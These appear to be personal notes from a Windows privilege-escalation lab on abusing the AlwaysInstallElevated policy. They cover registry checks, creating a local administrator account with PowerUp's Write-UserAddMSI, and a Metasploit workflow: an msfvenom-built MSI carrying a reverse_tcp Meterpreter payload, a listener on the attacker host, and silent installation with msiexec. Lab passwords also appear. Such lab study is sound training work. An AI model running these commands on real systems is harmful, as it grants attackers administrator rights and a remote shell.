AlwaysInstallElevated

MSI packages (windows installers). We can have these packages install elevated (as an admin user).

RDP into normal user:

Username: user
password: password321

Check:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

0x1 means 1 which means it’s enabled (aka we can exploit/use it for priv esc)

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

again 0x1 is enabled

Exploitation:

PowerUp results:

It says that the AlwaysInstallElevated AbuseFunction:

Write-UserAddMSI

All you have to do to use that abuse function is scroll to the bottom of these results in the powershell and:

Write-UserAddMSI

and it will do it for you…

It will make a UserAdd install in the folder. Run it

It will prompt you for a user to create and which group. We want group = Administrators

My user:

340i
BMW
Administrators

Check by running this in CMD:

net localgroup administrators

Kali:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
run

New Terminal:

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 -f msi -o setup.msi
python3 -m http.server 80

Windows VM

1.Place ‘setup.msi’ in ‘C:\Temp’.

2.Open command prompt and type: 

msiexec /quiet /qn /i C:\Temp\setup.msi

We get a shell

getuid

Can also (this didn’t work for me on my lab):

background
use exploit/windows/local/always_install_elevated
options
set session 1 #or whatever number session the meterpreter shell is on